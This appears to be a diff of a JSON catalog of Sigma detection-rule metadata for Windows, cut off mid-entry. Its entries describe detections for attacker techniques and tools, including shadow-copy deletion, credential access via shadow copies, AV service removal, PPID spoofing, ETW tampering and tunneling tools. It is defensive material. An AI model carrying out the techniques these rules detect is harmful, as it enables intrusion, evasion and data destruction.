- "author": "Tim Shelton, Florian Roth, Yassine Oukessou (fix + fp)",
- "creation_date": "2022/01/13",
- 
"falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_run_executable_invalid_extension.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1481630810495139841?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml" - ], - "tags": "No established tags" - }, - "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "value": "Rundll32 Execution Without DLL File" - }, - { - "description": "Payloads may be compressed, archived, or encrypted in order to avoid detection", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_run_from_zip.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_from_zip.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "1a70042a-6622-4a2b-8958-267625349abf", - "value": "Run from a Zip File" - }, - { - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "meta": { - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", - "creation_date": "2019/10/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_run_powershell_script_from_ads.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "value": "Run PowerShell Script from ADS" - }, - { - "description": "Detects PowerShell script execution via input stream redirect", - "meta": { - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", - "creation_date": "2020/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_run_powershell_script_from_input_stream.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", - "https://twitter.com/Moriarty_Meng/status/984380793383370752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", - "value": "Run PowerShell Script from Redirected Input Stream" - }, - { - "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. 
This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", - "meta": { - "author": "Janantha Marasinghe", - "creation_date": "2020/09/26", - "falsepositive": [ - "This may have false positives on hosts where Virtualbox is legitimately being used for operations" - ], - "filename": "proc_creation_win_run_virtualbox.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1564/006/", - "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", - "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.006", - "attack.t1564" - ] - }, - "uuid": "bab049ca-7471-4828-9024-38279a4c04da", - "value": "Detect Virtualbox Driver Installation OR Starting Of VMs" - }, - { - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "meta": { - "author": "pH-T, Nasreddine Bencherchali", - "creation_date": "2022/03/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "value": "Suspicious Schtasks Execution AppData Folder" - }, - { - "description": "Detects scheduled task creation events that include 
suspicious actions, and is run once at 00:00", - "meta": { - "author": "pH-T", - "creation_date": "2022/07/15", - "falsepositive": [ - "Software installation" - ], - "filename": "proc_creation_win_schtasks_once_0000.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml" - ], - "tags": "No established tags" - }, - "uuid": "970823b7-273b-460a-8afc-3a6811998529", - "value": "Uncommon Scheduled Task Once 00:00" - }, - { - "description": "Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)", - "meta": { - "author": "pH-T, Florian Roth", - "creation_date": "2022/04/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_schtasks_powershell_windowsapps_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "b66474aa-bd92-4333-a16c-298155b120df", - "value": "Suspicious Powershell No File or Command" - }, - { - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "meta": { - "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", - "creation_date": 
"2022/02/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_schtasks_reg_loader.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "value": "Scheduled Task Executing Powershell Encoded Payload from Registry" - }, - { - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_schtasks_system.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "value": "Schtasks Creation Or Modification With SYSTEM Privileges" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target 
environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/02/13", - "falsepositive": [ - "Legitimate usage of the tool" - ], - "filename": "proc_creation_win_screenconnect.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", - "value": "Use of ScreenConnect Remote Access Software" - }, - { - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/25", - "falsepositive": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" - ], - "filename": "proc_creation_win_screenconnect_anomaly.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", - "value": "ScreenConnect Backstage Mode Anomaly" - 
}, - { - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/06/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_script_event_consumer_spawn.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "value": "Script Event Consumer Spawning Process" - }, - { - "description": "Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)" - ], - "filename": "proc_creation_win_sc_delete_av_services.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b", - "value": "Suspicious Execution of Sc to Delete AV Services" - }, - { - "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", - "meta": 
{ - "author": "frack113", - "creation_date": "2021/12/06", - "falsepositive": [ - "Legitimate query of a service by an administrator to get more information such as the state or PID" - ], - "filename": "proc_creation_win_sc_query.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1007" - ] - }, - "uuid": "57712d7a-679c-4a41-a913-87e7175ae429", - "value": "SC.EXE Query Execution" - }, - { - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" - ] - }, - "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", - "value": "Possible Shim Database Persistence via sdbinst.exe" - }, - { - "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "description": "Detects changes to environment variables related to ETW logging. 
This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020/05/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_etw_modification_cmdline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "41421f44-58f9-455d-838a-c398859841d4", + "value": "ETW Logging Tamper In .NET Processes" + }, + { + "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", + "meta": { + "author": "Nasreddine 
Bencherchali", + "creation_date": "2022/09/06", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_sdclt_child_process.yml", + "filename": "proc_creation_win_inline_win_api_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/m417z/status/1566674631788007425", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "value": "Potential WinAPI Access Via CommandLine" + }, + { + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Software installers that run from temporary folders and also install scheduled tasks" + ], + "filename": "proc_creation_win_susp_schtasks_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" + "https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "9494479d-d994-40bf-a8b1-eea890237021", + "value": "Suspicious Add Scheduled Task Parent" + }, + { + "description": "Detects Task Scheduler .job import arbitrary DACL write\\par", + "meta": { + "author": "Olaf Hartong", + "creation_date": "2019/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_win10_sched_task_0day.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml" ], "tags": [ "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1053.005", + "car.2013-08-001" ] }, - "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", - "value": "Sdclt Child Processes" + "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "value": "Windows 10 Scheduled Task SandboxEscaper 0-day" }, { - "description": "Detects the use of SDelete to erase a file not the free space", + "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.", "meta": { - "author": "frack113", - "creation_date": "2021/06/03", + "author": "David Burkett, Florian Roth", + "creation_date": "2019/12/28", "falsepositive": [ - "System administrator usage" + "Rare System Admin Activity" ], - "filename": "proc_creation_win_sdelete.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "a4824fca-976f-4964-b334-0621379e84c4", - "value": "Sysinternals SDelete Delete File" - }, - { - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", - "meta": { - "author": "Nextron Systems", - "creation_date": "2022/06/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", - "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" - ] - }, - "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", - "value": "Sdiagnhost Calling Suspicious Child Process" - }, - { - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/23", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_selectmyparent.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", - "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", - "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", - "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1134.004" - ] - }, - "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", - "value": "PPID Spoofing Tool Usage" - }, - { - "description": "Detects manual service 
execution (start) via system utilities.", - "meta": { - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Legitimate administrator or user executes a service for legitimate reasons." - ], - "filename": "proc_creation_win_service_execution.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", - "value": "Service Execution" - }, - { - "description": "Detects a windows service to be stopped", - "meta": { - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", - "creation_date": "2019/10/23", - "falsepositive": [ - "Administrator shutting down the service due to upgrade or removal purposes" - ], - "filename": "proc_creation_win_service_stop.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_stop.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90", - "value": "Stop Windows Service" - }, - { - "description": "Detects use of executionpolicy option to set insecure policies", - "meta": { - "author": "frack113", - "creation_date": "2021/11/01", - "falsepositive": [ - "Administrator script" - ], - "filename": "proc_creation_win_set_policies_to_unsecure_level.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", - "https://adsecurity.org/?p=2604", - "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", - "value": "Change PowerShell Policies to an Insecure Level" - }, - { - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_shadowcopy_deletion_via_powershell.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "value": "Deletion of Volume Shadow Copies via WMI with PowerShell" - }, - { - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/10/22", - 
"falsepositive": [ - "Legitimate administrator working with shadow copies, access for backup purposes" - ], - "filename": "proc_creation_win_shadow_copies_access_symlink.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" - ] - }, - "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "value": "Shadow Copies Access via Symlink" - }, - { - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "meta": { - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Legitimate administrator working with shadow copies, access for backup purposes" - ], - "filename": "proc_creation_win_shadow_copies_creation.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" - ] - }, - "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "value": "Shadow Copies Creation Using Operating Systems Utilities" - }, - { - "description": "Shadow Copies deletion using operating systems utilities", - "meta": { - "author": "Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, 
oscd.community, Andreas Hunkeler (@Karneades)", - "creation_date": "2019/10/22", - "falsepositive": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" - ], - "filename": "proc_creation_win_shadow_copies_deletion.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://blog.talosintelligence.com/2017/05/wannacry.html", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", - "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/Neo23x0/Raccine#the-process", - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" - ] - }, - "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "value": "Shadow Copies Deletion Using Operating Systems Utilities" - }, - { - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_sharpup.yml", + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml", "level": "critical", 
"logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/GhostPack/SharpUp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharpup.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" - ] - }, - "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "value": "SharpUp PrivEsc Tool" - }, - { - "description": "Detects usage of the Sharp Chisel via the commandline arguments", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/05", - "falsepositive": [ - "Some false positives may occure with other tools with similar commandlines" - ], - "filename": "proc_creation_win_sharp_chisel_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/shantanu561993/SharpChisel", - "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ] - }, - "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "value": "SharpChisel Usage" - }, - { - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. 
